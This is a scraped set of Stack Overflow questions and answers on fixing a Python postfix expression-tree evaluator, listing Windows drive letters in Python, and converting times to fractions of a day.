final print line makes an access to stack.node, but stack has no node attribute. You'll want to pop the top item from the stack, which (if the input syntax was correct) should only have 1 node left on it, representing the root of the tree. Not a problem, but i is guaranteed to be a string (with length 1), so there is no need to call str on it. Here is the corrected code: for i in list: if i.isdigit() is True: node = TreeNode(int(i)) # lowercase name stack.push(node) # don't push string, but object else: node = TreeNode(i) # First create the node node.right = stack.pop() # Then assign to its attributes node.left = stack.pop() stack.push(node) # don't push string # Don't evaluate here, nor push anything else to the stack print(evaluate(stack.pop()))
How to fix 'NoneType' has no attribute 'key', when trying to compare a key value to a string
I am writing a program where the user inputs a postfix expression and it outputs the answer. Current I am stuck when Using my 'evaluate' function within my for loop. Inside my For loop Main.py: else: # Debug Code print('{}: Else'.format(i)) print('{}: Length'.format(len(stack))) Node.right = stack.pop() Node.left = stack.pop() Node = TreeNode(str(i)) stack.push(str(i)) # Debug Code print('{}: Right Key'.format(Node.right)) print('{}: Left Key'.format(Node.left)) print('{}: Node Key'.format(Node.key)) print('{}: Node Key Type'.format(type(Node.key))) Node = evaluate(Node) stack.push(int(Node)) I am getting the error below: Traceback (most recent call last): File "c:\Users\dpr48\main.py", line 49, in <module> Node = evaluate(Node) File "c:\Users\dpr48\main.py", line 10, in evaluate return evaluate(node.left) + evaluate(node.right) File "c:\Users\dpr48\main.py", line 9, in evaluate if node.key == '+': AttributeError: 'NoneType' object has no attribute 'key' So my question is why is it not using the 'TreeNode' class to get the key value? As well as the line of code that should define the 'Node.left' as the 'stack.pop()' value and 'Node.right' as the 'stack.pop()' value ends up not changing either of them and leaves them as None, as found in the 'Debug Code' that I have implemented to see what the program is doing interenally. Provided each class used below: Main.py from Stack import Stack from TreeNode import TreeNode def evaluate(node): if node.key == '+': return evaluate(node.left) + evaluate(node.right) elif node.key == '-': return evaluate(node.left) - evaluate(node.right) elif node.key == '*': return evaluate(node.left) * evaluate(node.right) elif node.key == '/': return evaluate(node.left) / evaluate(node.right) else: return node.key stack = Stack() exp = "23+" list = [*exp] for i in list: if i.isdigit() is True: # Debug Code print('{}: True'.format(i)) Node = TreeNode(int(i)) stack.push(int(i)) else: # Debug Code print('{}: Else'.format(i)) print('{}: Length'.format(len(stack))) Node.right = stack.pop() Node.left = stack.pop() Node = TreeNode(str(i)) stack.push(str(i)) # Debug Code print('{}: Right Key'.format(Node.right)) print('{}: Left Key'.format(Node.left)) print('{}: Node Key'.format(Node.key)) print('{}: Node Key Type'.format(type(Node.key))) Node = evaluate(Node) stack.push(int(Node)) print(evaluate(stack.node)) Stack.py from Node import Node from LinkedList import LinkedList class Stack: def __init__(self): self.list = LinkedList() def push(self, new_item): # Create a new node to hold the item new_node = Node(new_item) # Insert the node as the list head (top of stack) self.list.prepend(new_node) def pop(self): # Copy data from list's head node (stack's top node) popped_item = self.list.head.data # Remove list head self.list.remove_after(None) # Return the popped item return popped_item def __len__(self): node = self.list.head # Start at head of stack to count until stack returns Null count = 0 while node != None: node = node.next count+=1 return count # Returning length of stack LinkedList.py class LinkedList: def __init__(self): self.head = None self.tail = None def append(self, new_node): if self.head == None: self.head = new_node self.tail = new_node else: self.tail.next = new_node self.tail = new_node def prepend(self, new_node): if self.head == None: self.head = new_node self.tail = new_node else: new_node.next = self.head self.head = new_node def insert_after(self, current_node, new_node): if self.head == None: self.head = new_node self.tail = new_node elif current_node is self.tail: self.tail.next = new_node self.tail = new_node else: new_node.next = current_node.next current_node.next = new_node def remove_after(self, current_node): # Special case, remove head if (current_node == None) and (self.head != None): succeeding_node = self.head.next self.head = succeeding_node if succeeding_node == None: # Remove last item self.tail = None elif current_node.next != None: succeeding_node = current_node.next.next current_node.next = succeeding_node if succeeding_node == None: # Remove tail self.tail = current_node Node.py class Node: def __init__(self, initial_data): self.data = initial_data self.next = None TreeNode.py class TreeNode: # Constructor assigns the given key, with left and right # children assigned with None. def __init__(self, key): self.key = key self.left = None self.right = None
[ "There are several issues:\n\nNode is the name of a class, yet you use the same name for a TreeNode instance, shadowing the class name. This is not the main problem, but certainly not advised. Related: Don't use PascalCase for instances, but camelCase. So node, not Node.\n\nYou assign to Node.right when you have not yet defined Node yet, which happens later with Node = TreeNode(str(i)). You should first assign to Node (well, better node) and only then assign to its attributes.\n\nWith Node.right = stack.pop() you clearly expect the stack to contain TreeNode instances, but with stack.push(str(i)) you push strings. That will lead to the problems you describe. The stack should not be populated with strings, but with TreeNode objects.\n\nAt the end of the else block you call evaluate, and then push that result value to the stack. This is wrong and should be removed. The evaluation should only happen when you have completed the tree, and it should not involve the stack. The stack has a role in building the tree, not in evaluating it.\n\nThe final print line makes an access to stack.node, but stack has no node attribute. You'll want to pop the top item from the stack, which (if the input syntax was correct) should only have 1 node left on it, representing the root of the tree.\n\nNot a problem, but i is guaranteed to be a string (with length 1), so there is no need to call str on it.\n\n\nHere is the corrected code:\nfor i in list:\n if i.isdigit() is True:\n node = TreeNode(int(i)) # lowercase name\n stack.push(node) # don't push string, but object\n else:\n node = TreeNode(i) # First create the node\n node.right = stack.pop() # Then assign to its attributes\n node.left = stack.pop()\n stack.push(node) # don't push string\n # Don't evaluate here, nor push anything else to the stack\n\n\nprint(evaluate(stack.pop()))\n\n" ]
[ 1 ]
[]
[]
[ "linked_list", "nodes", "postfix_notation", "python", "stack" ]
stackoverflow_0074593287_linked_list_nodes_postfix_notation_python_stack.txt
Q: Is there a way to list all the available Windows' drives? Is there a way in Python to list all the currently in-use drive letters in a Windows system? (My Google-fu seems to have let me down on this one) A C++ equivalent: Enumerating all available drive letters in Windows A: import win32api drives = win32api.GetLogicalDriveStrings() drives = drives.split('\000')[:-1] print drives Adapted from: http://www.faqts.com/knowledge_base/view.phtml/aid/4670 A: Without using any external libraries, if that matters to you: import string from ctypes import windll def get_drives(): drives = [] bitmask = windll.kernel32.GetLogicalDrives() for letter in string.uppercase: if bitmask & 1: drives.append(letter) bitmask >>= 1 return drives if __name__ == '__main__': print get_drives() # On my PC, this prints ['A', 'C', 'D', 'F', 'H'] A: Found this solution on Google, slightly modified from original. Seem pretty pythonic and does not need any "exotic" imports import os, string available_drives = ['%s:' % d for d in string.ascii_uppercase if os.path.exists('%s:' % d)] A: I wrote this piece of code: import os drives = [ chr(x) + ":" for x in range(65,91) if os.path.exists(chr(x) + ":") ] It's based on @Barmaley's answer, but has the advantage of not using the string module, in case you don't want to use it. It also works on my system, unlike @SingleNegationElimination's answer. A: Those look like better answers. Here's my hackish cruft import os, re re.findall(r"[A-Z]+:.*$",os.popen("mountvol /").read(),re.MULTILINE) Riffing a bit on RichieHindle's answer; it's not really better, but you can get windows to do the work of coming up with actual letters of the alphabet >>> import ctypes >>> buff_size = ctypes.windll.kernel32.GetLogicalDriveStringsW(0,None) >>> buff = ctypes.create_string_buffer(buff_size*2) >>> ctypes.windll.kernel32.GetLogicalDriveStringsW(buff_size,buff) 8 >>> filter(None, buff.raw.decode('utf-16-le').split(u'\0')) [u'C:\\', u'D:\\'] A: The Microsoft Script Repository includes this recipe which might help. I don't have a windows machine to test it, though, so I'm not sure if you want "Name", "System Name", "Volume Name", or maybe something else. import win32com.client strComputer = "." objWMIService = win32com.client.Dispatch("WbemScripting.SWbemLocator") objSWbemServices = objWMIService.ConnectServer(strComputer,"root\cimv2") colItems = objSWbemServices.ExecQuery("Select * from Win32_LogicalDisk") for objItem in colItems: print "Access: ", objItem.Access print "Availability: ", objItem.Availability print "Block Size: ", objItem.BlockSize print "Caption: ", objItem.Caption print "Compressed: ", objItem.Compressed print "Config Manager Error Code: ", objItem.ConfigManagerErrorCode print "Config Manager User Config: ", objItem.ConfigManagerUserConfig print "Creation Class Name: ", objItem.CreationClassName print "Description: ", objItem.Description print "Device ID: ", objItem.DeviceID print "Drive Type: ", objItem.DriveType print "Error Cleared: ", objItem.ErrorCleared print "Error Description: ", objItem.ErrorDescription print "Error Methodology: ", objItem.ErrorMethodology print "File System: ", objItem.FileSystem print "Free Space: ", objItem.FreeSpace print "Install Date: ", objItem.InstallDate print "Last Error Code: ", objItem.LastErrorCode print "Maximum Component Length: ", objItem.MaximumComponentLength print "Media Type: ", objItem.MediaType print "Name: ", objItem.Name print "Number Of Blocks: ", objItem.NumberOfBlocks print "PNP Device ID: ", objItem.PNPDeviceID z = objItem.PowerManagementCapabilities if z is None: a = 1 else: for x in z: print "Power Management Capabilities: ", x print "Power Management Supported: ", objItem.PowerManagementSupported print "Provider Name: ", objItem.ProviderName print "Purpose: ", objItem.Purpose print "Quotas Disabled: ", objItem.QuotasDisabled print "Quotas Incomplete: ", objItem.QuotasIncomplete print "Quotas Rebuilding: ", objItem.QuotasRebuilding print "Size: ", objItem.Size print "Status: ", objItem.Status print "Status Info: ", objItem.StatusInfo print "Supports Disk Quotas: ", objItem.SupportsDiskQuotas print "Supports File-Based Compression: ", objItem.SupportsFileBasedCompression print "System Creation Class Name: ", objItem.SystemCreationClassName print "System Name: ", objItem.SystemName print "Volume Dirty: ", objItem.VolumeDirty print "Volume Name: ", objItem.VolumeName print "Volume Serial Number: ", objItem.VolumeSerialNumber A: Here is another great solution if you want to list only drives on your disc and not mapped network drives. If you want to filter by different attributes just print drps. import psutil drps = psutil.disk_partitions() drives = [dp.device for dp in drps if dp.fstype == 'NTFS'] A: On Windows you can do a os.popen import os print os.popen("fsutil fsinfo drives").readlines() A: More optimal solution based on @RichieHindle def get_drives(): drives = [] bitmask = windll.kernel32.GetLogicalDrives() letter = ord('A') while bitmask > 0: if bitmask & 1: drives.append(chr(letter) + ':\\') bitmask >>= 1 letter += 1 return drives A: here's a simpler version, without installing any additional modules or any functions. Since drive letters can't go beyond A and Z, you can search if there is path available for each alphabet, like below: >>> import os >>> for drive_letter in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ': if os.path.exists(f'{drive_letter}:'): print(f'{drive_letter}:') else: pass the one-liner: >>> import os >>> [f'{d}:' for d in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' if os.path.exists(f'{d}:')] ['C:', 'D:'] A: As part of a similar task I also needed to grab a free drive letter. I decided I wanted the highest available letter. I first wrote it out more idiomatically, then crunched it to a 1-liner to see if it still made sense. As awesome as list comprehensions are I love sets for this: unused=set(alphabet)-set(used) instead of having to do unused = [a for a in aphabet if a not in used]. Cool stuff! def get_used_drive_letters(): drives = win32api.GetLogicalDriveStrings() drives = drives.split('\000')[:-1] letters = [d[0] for d in drives] return letters def get_unused_drive_letters(): alphabet = map(chr, range(ord('A'), ord('Z')+1)) used = get_used_drive_letters() unused = list(set(alphabet)-set(used)) return unused def get_highest_unused_drive_letter(): unused = get_unused_drive_letters() highest = list(reversed(sorted(unused)))[0] return highest The one liner: def get_drive(): highest = sorted(list(set(map(chr, range(ord('A'), ord('Z')+1))) - set(win32api.GetLogicalDriveStrings().split(':\\\000')[:-1])))[-1] I also chose the alphabet using map/range/ord/chr over using string since parts of string are deprecated. A: Here's my higher-performance approach (could probably be higher): >>> from string import ascii_uppercase >>> reverse_alphabet = ascii_uppercase[::-1] >>> from ctypes import windll # Windows only >>> GLD = windll.kernel32.GetLogicalDisk >>> drives = ['%s:/'%reverse_alphabet[i] for i,v in enumerate(bin(GLD())[2:]) if v=='1'] Nobody really uses python's performative featurability... Yes, I'm not following Windows standard path conventions ('\\')... In all my years of using python, I've had no problems with '/' anywhere paths are used, and have made it standard in my programs. A: This code will return of list of drivenames and letters, for example: ['Gateway(C:)', 'EOS_DIGITAL(L:)', 'Music Archive(O:)'] It only uses the standard library. It builds on a few ideas I found above. windll.kernel32.GetVolumeInformationW() returns 0 if the disk drive is empty, a CD rom without a disk for example. This code does not list these empty drives. These 2 lines capture the letters of all of the drives: bitmask = (bin(windll.kernel32.GetLogicalDrives())[2:])[::-1] # strip off leading 0b and reverse drive_letters = [ascii_uppercase[i] + ':/' for i, v in enumerate(bitmask) if v == '1'] Here is the full routine: from ctypes import windll, create_unicode_buffer, c_wchar_p, sizeof from string import ascii_uppercase def get_win_drive_names(): volumeNameBuffer = create_unicode_buffer(1024) fileSystemNameBuffer = create_unicode_buffer(1024) serial_number = None max_component_length = None file_system_flags = None drive_names = [] # Get the drive letters, then use the letters to get the drive names bitmask = (bin(windll.kernel32.GetLogicalDrives())[2:])[::-1] # strip off leading 0b and reverse drive_letters = [ascii_uppercase[i] + ':/' for i, v in enumerate(bitmask) if v == '1'] for d in drive_letters: rc = windll.kernel32.GetVolumeInformationW(c_wchar_p(d), volumeNameBuffer, sizeof(volumeNameBuffer), serial_number, max_component_length, file_system_flags, fileSystemNameBuffer, sizeof(fileSystemNameBuffer)) if rc: drive_names.append(f'{volumeNameBuffer.value}({d[:2]})') # disk_name(C:) return drive_names A: This will help to find valid drives in windows os import os import string drive = string.ascii_uppercase valid_drives = [] for each_drive in drive: if os.path.exist(each_drive+":\\"): print(each_drive) valid_drives.append(each_drive+":\\") print(valid_drives) The output will be C D E ['C:\\','D:\\','E:\\'] A: If you want only the letters for each drive, you can just: from win32.win32api import GetLogicalDriveStrings drives = [drive for drive in GetLogicalDriveStrings()[0]] A: As I don't have win32api installed on my field of notebooks I used this solution using wmic: import subprocess import string #define alphabet alphabet = [] for i in string.ascii_uppercase: alphabet.append(i + ':') #get letters that are mounted somewhere mounted_letters = subprocess.Popen("wmic logicaldisk get name", shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) #erase mounted letters from alphabet in nested loop for line in mounted_letters.stdout.readlines(): if "Name" in line: continue for letter in alphabet: if letter in line: print 'Deleting letter %s from free alphabet %s' % letter alphabet.pop(alphabet.index(letter)) print alphabet alternatively you can get the difference from both list like this simpler solution (after launching wmic subprocess as mounted_letters): #get output to list mounted_letters_list = [] for line in mounted_letters.stdout.readlines(): if "Name" in line: continue mounted_letters_list.append(line.strip()) rest = list(set(alphabet) - set(mounted_letters_list)) rest.sort() print rest both solutions are similiarly fast, yet I guess set list is better for some reason, right? A: if you don't want to worry about cross platform issues, including those across python platforms such as Pypy, and want something decently performative to be used when drives are updated during runtime: >>> from os.path import exists >>> from sys import platform >>> drives = ''.join( l for l in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' if exists('%s:/'%l) ) if platform=='win32' else '' >>> drives 'CZ' here's my performance test of this code: 4000 iterations; threshold of min + 250ns: __________________________________________________________________________________________________________code___|_______min______|_______max______|_______avg______|_efficiency ⡇⠀⠀⢀⠀⠀⠀⠀⠀⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣷⣷⣶⣼⣶⣴⣴⣤⣤⣧⣤⣤⣠⣠⣤⣤⣶⣤⣤⣄⣠⣦⣤⣠⣤⣤⣤⣤⣄⣠⣤⣠⣤⣤⣠⣤⣤⣤⣤⣤⣤⣄⣤⣤⣄⣤⣄⣤⣠⣀⣀⣤⣄⣤⢀⣀⢀⣠⣠⣀⣀⣤⣀⣠ drives = ''.join( l for l in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' if exists('%s:/'%l) ) if platform=='win32' else '' | 290.049ns | 1975.975ns | 349.911ns | 82.892% A: List hard drives using command prompt windows in python Similarly, you can do it for Linux with a few changes import os,re regex = r"([^\s]*:)" driver = os.popen("wmic logicaldisk get name").read() print(re.findall(regex, driver)) sample output: ['A:', 'C:', 'D:', 'E:', 'F:', 'G:', 'H:', 'I:', 'J:', 'L:']
Is there a way to list all the available Windows' drives?
Is there a way in Python to list all the currently in-use drive letters in a Windows system? (My Google-fu seems to have let me down on this one) A C++ equivalent: Enumerating all available drive letters in Windows
[ "import win32api\n\ndrives = win32api.GetLogicalDriveStrings()\ndrives = drives.split('\\000')[:-1]\nprint drives\n\nAdapted from:\nhttp://www.faqts.com/knowledge_base/view.phtml/aid/4670\n", "Without using any external libraries, if that matters to you:\nimport string\nfrom ctypes import windll\n\ndef get_drives():\n drives = []\n bitmask = windll.kernel32.GetLogicalDrives()\n for letter in string.uppercase:\n if bitmask & 1:\n drives.append(letter)\n bitmask >>= 1\n\n return drives\n\nif __name__ == '__main__':\n print get_drives() # On my PC, this prints ['A', 'C', 'D', 'F', 'H']\n\n", "Found this solution on Google, slightly modified from original. Seem pretty pythonic and does not need any \"exotic\" imports\nimport os, string\navailable_drives = ['%s:' % d for d in string.ascii_uppercase if os.path.exists('%s:' % d)]\n\n", "I wrote this piece of code:\nimport os\ndrives = [ chr(x) + \":\" for x in range(65,91) if os.path.exists(chr(x) + \":\") ]\n\nIt's based on @Barmaley's answer, but has the advantage of not using the string\nmodule, in case you don't want to use it. It also works on my system, unlike @SingleNegationElimination's answer.\n", "Those look like better answers. Here's my hackish cruft\nimport os, re\nre.findall(r\"[A-Z]+:.*$\",os.popen(\"mountvol /\").read(),re.MULTILINE)\n\nRiffing a bit on RichieHindle's answer; it's not really better, but you can get windows to do the work of coming up with actual letters of the alphabet\n>>> import ctypes\n>>> buff_size = ctypes.windll.kernel32.GetLogicalDriveStringsW(0,None)\n>>> buff = ctypes.create_string_buffer(buff_size*2)\n>>> ctypes.windll.kernel32.GetLogicalDriveStringsW(buff_size,buff)\n8\n>>> filter(None, buff.raw.decode('utf-16-le').split(u'\\0'))\n[u'C:\\\\', u'D:\\\\']\n\n", "The Microsoft Script Repository includes this recipe which might help. I don't have a windows machine to test it, though, so I'm not sure if you want \"Name\", \"System Name\", \"Volume Name\", or maybe something else.\nimport win32com.client \nstrComputer = \".\" \nobjWMIService = win32com.client.Dispatch(\"WbemScripting.SWbemLocator\") \nobjSWbemServices = objWMIService.ConnectServer(strComputer,\"root\\cimv2\") \ncolItems = objSWbemServices.ExecQuery(\"Select * from Win32_LogicalDisk\") \nfor objItem in colItems: \n print \"Access: \", objItem.Access \n print \"Availability: \", objItem.Availability \n print \"Block Size: \", objItem.BlockSize \n print \"Caption: \", objItem.Caption \n print \"Compressed: \", objItem.Compressed \n print \"Config Manager Error Code: \", objItem.ConfigManagerErrorCode \n print \"Config Manager User Config: \", objItem.ConfigManagerUserConfig \n print \"Creation Class Name: \", objItem.CreationClassName \n print \"Description: \", objItem.Description \n print \"Device ID: \", objItem.DeviceID \n print \"Drive Type: \", objItem.DriveType \n print \"Error Cleared: \", objItem.ErrorCleared \n print \"Error Description: \", objItem.ErrorDescription \n print \"Error Methodology: \", objItem.ErrorMethodology \n print \"File System: \", objItem.FileSystem \n print \"Free Space: \", objItem.FreeSpace \n print \"Install Date: \", objItem.InstallDate \n print \"Last Error Code: \", objItem.LastErrorCode \n print \"Maximum Component Length: \", objItem.MaximumComponentLength \n print \"Media Type: \", objItem.MediaType \n print \"Name: \", objItem.Name \n print \"Number Of Blocks: \", objItem.NumberOfBlocks \n print \"PNP Device ID: \", objItem.PNPDeviceID \n z = objItem.PowerManagementCapabilities \n if z is None: \n a = 1 \n else: \n for x in z: \n print \"Power Management Capabilities: \", x \n print \"Power Management Supported: \", objItem.PowerManagementSupported \n print \"Provider Name: \", objItem.ProviderName \n print \"Purpose: \", objItem.Purpose \n print \"Quotas Disabled: \", objItem.QuotasDisabled \n print \"Quotas Incomplete: \", objItem.QuotasIncomplete \n print \"Quotas Rebuilding: \", objItem.QuotasRebuilding \n print \"Size: \", objItem.Size \n print \"Status: \", objItem.Status \n print \"Status Info: \", objItem.StatusInfo \n print \"Supports Disk Quotas: \", objItem.SupportsDiskQuotas \n print \"Supports File-Based Compression: \", objItem.SupportsFileBasedCompression \n print \"System Creation Class Name: \", objItem.SystemCreationClassName \n print \"System Name: \", objItem.SystemName \n print \"Volume Dirty: \", objItem.VolumeDirty \n print \"Volume Name: \", objItem.VolumeName \n print \"Volume Serial Number: \", objItem.VolumeSerialNumber \n\n", "Here is another great solution if you want to list only drives on your disc and not mapped network drives. If you want to filter by different attributes just print drps.\nimport psutil\ndrps = psutil.disk_partitions()\ndrives = [dp.device for dp in drps if dp.fstype == 'NTFS']\n\n", "On Windows you can do a os.popen\nimport os\nprint os.popen(\"fsutil fsinfo drives\").readlines()\n\n", "More optimal solution based on @RichieHindle\ndef get_drives():\n drives = []\n bitmask = windll.kernel32.GetLogicalDrives()\n letter = ord('A')\n while bitmask > 0:\n if bitmask & 1:\n drives.append(chr(letter) + ':\\\\')\n bitmask >>= 1\n letter += 1\n\n return drives\n\n", "here's a simpler version, without installing any additional modules or any functions. Since drive letters can't go beyond A and Z, you can search if there is path available for each alphabet, like below:\n>>> import os\n>>> for drive_letter in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':\n if os.path.exists(f'{drive_letter}:'):\n print(f'{drive_letter}:')\n else:\n pass\n\nthe one-liner:\n>>> import os\n>>> [f'{d}:' for d in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' if os.path.exists(f'{d}:')]\n['C:', 'D:']\n\n", "As part of a similar task I also needed to grab a free drive letter. I decided I wanted the highest available letter. I first wrote it out more idiomatically, then crunched it to a 1-liner to see if it still made sense. As awesome as list comprehensions are I love sets for this: unused=set(alphabet)-set(used) instead of having to do unused = [a for a in aphabet if a not in used]. Cool stuff!\ndef get_used_drive_letters():\n drives = win32api.GetLogicalDriveStrings()\n drives = drives.split('\\000')[:-1]\n letters = [d[0] for d in drives]\n return letters\n\ndef get_unused_drive_letters():\n alphabet = map(chr, range(ord('A'), ord('Z')+1))\n used = get_used_drive_letters()\n unused = list(set(alphabet)-set(used))\n return unused\n\ndef get_highest_unused_drive_letter():\n unused = get_unused_drive_letters()\n highest = list(reversed(sorted(unused)))[0]\n return highest\n\nThe one liner:\ndef get_drive():\n highest = sorted(list(set(map(chr, range(ord('A'), ord('Z')+1))) -\n set(win32api.GetLogicalDriveStrings().split(':\\\\\\000')[:-1])))[-1]\n\nI also chose the alphabet using map/range/ord/chr over using string since parts of string are deprecated.\n", "Here's my higher-performance approach (could probably be higher):\n>>> from string import ascii_uppercase\n>>> reverse_alphabet = ascii_uppercase[::-1]\n>>> from ctypes import windll # Windows only\n>>> GLD = windll.kernel32.GetLogicalDisk\n>>> drives = ['%s:/'%reverse_alphabet[i] for i,v in enumerate(bin(GLD())[2:]) if v=='1']\n\nNobody really uses python's performative featurability...\nYes, I'm not following Windows standard path conventions ('\\\\')... \nIn all my years of using python, I've had no problems with '/' anywhere paths are used, and have made it standard in my programs.\n", "This code will return of list of drivenames and letters, for example:\n['Gateway(C:)', 'EOS_DIGITAL(L:)', 'Music Archive(O:)']\nIt only uses the standard library. It builds on a few ideas I found above.\nwindll.kernel32.GetVolumeInformationW() returns 0 if the disk drive is empty, a CD rom without a disk for example. This code does not list these empty drives.\nThese 2 lines capture the letters of all of the drives:\nbitmask = (bin(windll.kernel32.GetLogicalDrives())[2:])[::-1] # strip off leading 0b and reverse\ndrive_letters = [ascii_uppercase[i] + ':/' for i, v in enumerate(bitmask) if v == '1']\n\nHere is the full routine:\nfrom ctypes import windll, create_unicode_buffer, c_wchar_p, sizeof\nfrom string import ascii_uppercase\n\ndef get_win_drive_names():\n volumeNameBuffer = create_unicode_buffer(1024)\n fileSystemNameBuffer = create_unicode_buffer(1024)\n serial_number = None\n max_component_length = None\n file_system_flags = None\n drive_names = []\n # Get the drive letters, then use the letters to get the drive names\n bitmask = (bin(windll.kernel32.GetLogicalDrives())[2:])[::-1] # strip off leading 0b and reverse\n drive_letters = [ascii_uppercase[i] + ':/' for i, v in enumerate(bitmask) if v == '1']\n\n for d in drive_letters:\n rc = windll.kernel32.GetVolumeInformationW(c_wchar_p(d), volumeNameBuffer, sizeof(volumeNameBuffer),\n serial_number, max_component_length, file_system_flags,\n fileSystemNameBuffer, sizeof(fileSystemNameBuffer))\n if rc:\n drive_names.append(f'{volumeNameBuffer.value}({d[:2]})') # disk_name(C:)\n return drive_names\n\n", "This will help to find valid drives in windows os\nimport os\nimport string\ndrive = string.ascii_uppercase\nvalid_drives = []\nfor each_drive in drive:\n if os.path.exist(each_drive+\":\\\\\"):\n print(each_drive)\n valid_drives.append(each_drive+\":\\\\\")\nprint(valid_drives)\n\nThe output will be\nC\nD\nE\n['C:\\\\','D:\\\\','E:\\\\']\n\n", "If you want only the letters for each drive, you can just:\nfrom win32.win32api import GetLogicalDriveStrings\n\n\ndrives = [drive for drive in GetLogicalDriveStrings()[0]]\n\n", "As I don't have win32api installed on my field of notebooks I used this solution using wmic:\nimport subprocess\nimport string\n\n#define alphabet\nalphabet = []\nfor i in string.ascii_uppercase:\n alphabet.append(i + ':')\n\n#get letters that are mounted somewhere\nmounted_letters = subprocess.Popen(\"wmic logicaldisk get name\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n#erase mounted letters from alphabet in nested loop\nfor line in mounted_letters.stdout.readlines():\n if \"Name\" in line:\n continue\n for letter in alphabet:\n if letter in line:\n print 'Deleting letter %s from free alphabet %s' % letter\n alphabet.pop(alphabet.index(letter))\n\nprint alphabet\n\nalternatively you can get the difference from both list like this simpler solution (after launching wmic subprocess as mounted_letters):\n#get output to list\nmounted_letters_list = []\nfor line in mounted_letters.stdout.readlines():\n if \"Name\" in line:\n continue\n mounted_letters_list.append(line.strip())\n\nrest = list(set(alphabet) - set(mounted_letters_list))\nrest.sort()\nprint rest\n\nboth solutions are similiarly fast, yet I guess set list is better for some reason, right?\n", "if you don't want to worry about cross platform issues, including those across python platforms such as Pypy, and want something decently performative to be used when drives are updated during runtime:\n>>> from os.path import exists\n>>> from sys import platform\n>>> drives = ''.join( l for l in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' if exists('%s:/'%l) ) if platform=='win32' else ''\n>>> drives\n'CZ'\n\nhere's my performance test of this code:\n4000 iterations; threshold of min + 250ns:\n__________________________________________________________________________________________________________code___|_______min______|_______max______|_______avg______|_efficiency\n⡇⠀⠀⢀⠀⠀⠀⠀⠀⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⣷⣷⣶⣼⣶⣴⣴⣤⣤⣧⣤⣤⣠⣠⣤⣤⣶⣤⣤⣄⣠⣦⣤⣠⣤⣤⣤⣤⣄⣠⣤⣠⣤⣤⣠⣤⣤⣤⣤⣤⣤⣄⣤⣤⣄⣤⣄⣤⣠⣀⣀⣤⣄⣤⢀⣀⢀⣠⣠⣀⣀⣤⣀⣠\n drives = ''.join( l for l in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' if exists('%s:/'%l) ) if platform=='win32' else '' | 290.049ns | 1975.975ns | 349.911ns | 82.892%\n\n", "List hard drives using command prompt windows in python\nSimilarly, you can do it for Linux with a few changes\nimport os,re\nregex = r\"([^\\s]*:)\"\ndriver = os.popen(\"wmic logicaldisk get name\").read()\n\nprint(re.findall(regex, driver))\n\nsample output:\n['A:', 'C:', 'D:', 'E:', 'F:', 'G:', 'H:', 'I:', 'J:', 'L:']\n\n" ]
[ 75, 73, 24, 19, 14, 10, 7, 4, 3, 3, 1, 1, 1, 1, 1, 0, 0, 0 ]
[]
[]
[ "python", "windows" ]
stackoverflow_0000827371_python_windows.txt
Q: Convert between hh:mm:ss time and a float that is a fraction of 24 hours I get as input times (hh:mm:ss) as float - e.g. 18:52:18 is a float 0.786331018518518. I achieved to calculate the time from a float value with this code: val = 0.786331018518518 hour = int(val*24) minute = int((val*24-hour)*60) seconds = int(((val*24-hour)*60-minute)*60) print(f"{hour}:{minute}:{seconds}") How is it possible to calculate the float value from a time - so from 18:52:18 to 0.786331018518518? And generally isn't there an easier way to convert in both directions between float and time (I was thinking about the datetime module but was not able to find anything for this)? A: What you have is an amount of time, in day unit You can use datetime.timedelta that represents a duration val = 0.786331018518518 d = timedelta(days=val) print(d) # 18:52:19 val = d.total_seconds() / 86400 print(val) # 0.7863310185185185 From your hour/minute/seconds variables it would be print(hour / 24 + minute / 1440 + seconds / 86400) A: I'm assuming the float-value is the time in days. To get the float-value from time, you can convert each of them (hours, minutes, seconds) to days and add them all up. So hours/24+minutes/60/24+seconds/60/60/24 would work.
Convert between hh:mm:ss time and a float that is a fraction of 24 hours
I get as input times (hh:mm:ss) as float - e.g. 18:52:18 is a float 0.786331018518518. I achieved to calculate the time from a float value with this code: val = 0.786331018518518 hour = int(val*24) minute = int((val*24-hour)*60) seconds = int(((val*24-hour)*60-minute)*60) print(f"{hour}:{minute}:{seconds}") How is it possible to calculate the float value from a time - so from 18:52:18 to 0.786331018518518? And generally isn't there an easier way to convert in both directions between float and time (I was thinking about the datetime module but was not able to find anything for this)?
[ "What you have is an amount of time, in day unit\nYou can use datetime.timedelta that represents a duration\nval = 0.786331018518518\nd = timedelta(days=val)\nprint(d) # 18:52:19\n\nval = d.total_seconds() / 86400\nprint(val) # 0.7863310185185185\n\n\nFrom your hour/minute/seconds variables it would be\nprint(hour / 24 + minute / 1440 + seconds / 86400)\n\n", "I'm assuming the float-value is the time in days.\nTo get the float-value from time, you can convert each of them (hours, minutes, seconds) to days and add them all up.\nSo hours/24+minutes/60/24+seconds/60/60/24 would work.\n" ]
[ 3, 1 ]
[]
[]
[ "datetime", "python" ]
stackoverflow_0074593414_datetime_python.txt
